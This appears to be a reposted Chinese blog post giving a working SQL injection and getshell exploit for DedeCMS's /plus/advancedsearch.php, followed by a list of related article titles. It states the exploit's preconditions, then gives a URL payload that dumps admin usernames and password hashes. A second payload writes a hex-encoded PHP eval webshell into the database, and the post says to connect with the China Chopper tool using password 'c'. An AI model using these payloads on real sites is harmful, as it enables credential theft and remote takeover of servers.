dedecms最新注入和getshell漏洞利用

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了dedecms最新注入和getshell漏洞利用相关的知识,希望对你有一定的参考价值。

漏洞分析:https://www.t00ls.net/thread-35569-1-1.html

条件利用:

1.漏洞代码在/plus/advancedsearch.php 文件中
2.php.ini要开启session.auto_start = 1
3.必须知道一个存在的mid,需要后台有添加自定义搜索模型

爆账号密码poc:

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%[email protected]__admin` aaa &sqlhash=123

getshell poc:

http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%[email protected]__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123

然后菜刀链接http://localhost/dedecms/plus/mytag_js.php?aid=1 密码:c

以上是关于dedecms最新注入和getshell漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章

PageAdmin Cms V2.0 getshell 0day

dedecms模版soft_add.phpSQL注入漏洞修复方法

文件包含漏洞利用方式-日志注入getshell

利用Thinkphp 5缓存漏洞实现前台Getshell

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

dedecms5.7最新漏洞修复